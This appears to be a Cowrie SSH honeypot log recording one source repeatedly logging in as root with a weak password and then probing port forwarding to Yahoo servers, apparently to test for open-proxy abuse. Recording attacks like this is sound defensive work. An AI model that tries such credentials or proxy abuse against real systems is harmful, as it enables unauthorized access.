{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:52.247635Z","src_ip":"213.209.150.239","session":"e39101b2b0e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":14526,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:14526","sensor":"my-vps","timestamp":"2025-08-26T00:55:52.403070Z","session":"e39101b2b0e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:52.459640Z","src_ip":"213.209.150.239","session":"e39101b2b0e0"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:52.517102Z","src_ip":"213.209.150.239","session":"e39101b2b0e0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53799,"dst_ip":"1.2.3.4","dst_port":22,"session":"b00c93cbefc2","protocol":"ssh","message":"New connection: 213.209.150.239:53799 (1.2.3.4:22) [session: b00c93cbefc2]","sensor":"my-vps","timestamp":"2025-08-26T00:55:52.563252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:52.564154Z","src_ip":"213.209.150.239","session":"b00c93cbefc2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:52.611350Z","src_ip":"213.209.150.239","session":"b00c93cbefc2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:52.846682Z","src_ip":"213.209.150.239","session":"b00c93cbefc2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":19595,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:19595","sensor":"my-vps","timestamp":"2025-08-26T00:55:52.894721Z","session":"b00c93cbefc2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:52.941972Z","src_ip":"213.209.150.239","session":"b00c93cbefc2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":18195,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:18195","sensor":"my-vps","timestamp":"2025-08-26T00:55:53.077836Z","session":"b00c93cbefc2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:53.125531Z","src_ip":"213.209.150.239","session":"b00c93cbefc2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:53.173753Z","src_ip":"213.209.150.239","session":"b00c93cbefc2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53839,"dst_ip":"1.2.3.4","dst_port":22,"session":"caf51a7387c4","protocol":"ssh","message":"New connection: 213.209.150.239:53839 (1.2.3.4:22) [session: caf51a7387c4]","sensor":"my-vps","timestamp":"2025-08-26T00:55:53.229631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:53.230354Z","src_ip":"213.209.150.239","session":"caf51a7387c4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:53.287017Z","src_ip":"213.209.150.239","session":"caf51a7387c4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:53.568874Z","src_ip":"213.209.150.239","session":"caf51a7387c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":14666,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:14666","sensor":"my-vps","timestamp":"2025-08-26T00:55:53.626497Z","session":"caf51a7387c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:53.684232Z","src_ip":"213.209.150.239","session":"caf51a7387c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":22683,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:22683","sensor":"my-vps","timestamp":"2025-08-26T00:55:53.839172Z","session":"caf51a7387c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:53.896096Z","src_ip":"213.209.150.239","session":"caf51a7387c4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:53.953473Z","src_ip":"213.209.150.239","session":"caf51a7387c4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53878,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4dc3f7ec17b","protocol":"ssh","message":"New connection: 213.209.150.239:53878 (1.2.3.4:22) [session: e4dc3f7ec17b]","sensor":"my-vps","timestamp":"2025-08-26T00:55:53.999598Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:54.000442Z","src_ip":"213.209.150.239","session":"e4dc3f7ec17b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:54.047442Z","src_ip":"213.209.150.239","session":"e4dc3f7ec17b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:54.282444Z","src_ip":"213.209.150.239","session":"e4dc3f7ec17b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":10539,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:10539","sensor":"my-vps","timestamp":"2025-08-26T00:55:54.330393Z","session":"e4dc3f7ec17b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:54.377593Z","src_ip":"213.209.150.239","session":"e4dc3f7ec17b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":12147,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:12147","sensor":"my-vps","timestamp":"2025-08-26T00:55:54.513468Z","session":"e4dc3f7ec17b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:54.560575Z","src_ip":"213.209.150.239","session":"e4dc3f7ec17b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:54.608296Z","src_ip":"213.209.150.239","session":"e4dc3f7ec17b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53926,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a0c8845c59e","protocol":"ssh","message":"New connection: 213.209.150.239:53926 (1.2.3.4:22) [session: 9a0c8845c59e]","sensor":"my-vps","timestamp":"2025-08-26T00:55:54.664078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:54.665945Z","src_ip":"213.209.150.239","session":"9a0c8845c59e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:54.722654Z","src_ip":"213.209.150.239","session":"9a0c8845c59e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:55.005706Z","src_ip":"213.209.150.239","session":"9a0c8845c59e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":2912,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:2912","sensor":"my-vps","timestamp":"2025-08-26T00:55:55.063598Z","session":"9a0c8845c59e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:55.120421Z","src_ip":"213.209.150.239","session":"9a0c8845c59e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":12682,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:12682","sensor":"my-vps","timestamp":"2025-08-26T00:55:55.275049Z","session":"9a0c8845c59e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:55.331556Z","src_ip":"213.209.150.239","session":"9a0c8845c59e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:55.388876Z","src_ip":"213.209.150.239","session":"9a0c8845c59e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53971,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a6ae5a98864","protocol":"ssh","message":"New connection: 213.209.150.239:53971 (1.2.3.4:22) [session: 3a6ae5a98864]","sensor":"my-vps","timestamp":"2025-08-26T00:55:55.435128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:55.436055Z","src_ip":"213.209.150.239","session":"3a6ae5a98864"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:55.483158Z","src_ip":"213.209.150.239","session":"3a6ae5a98864"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:55.718390Z","src_ip":"213.209.150.239","session":"3a6ae5a98864"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":23387,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:23387","sensor":"my-vps","timestamp":"2025-08-26T00:55:55.766895Z","session":"3a6ae5a98864"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:55.814256Z","src_ip":"213.209.150.239","session":"3a6ae5a98864"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":19726,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:19726","sensor":"my-vps","timestamp":"2025-08-26T00:55:55.949560Z","session":"3a6ae5a98864"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:55.996970Z","src_ip":"213.209.150.239","session":"3a6ae5a98864"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:56.045182Z","src_ip":"213.209.150.239","session":"3a6ae5a98864"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54014,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffaaa4a730a2","protocol":"ssh","message":"New connection: 213.209.150.239:54014 (1.2.3.4:22) [session: ffaaa4a730a2]","sensor":"my-vps","timestamp":"2025-08-26T00:55:56.091459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:56.092699Z","src_ip":"213.209.150.239","session":"ffaaa4a730a2"}
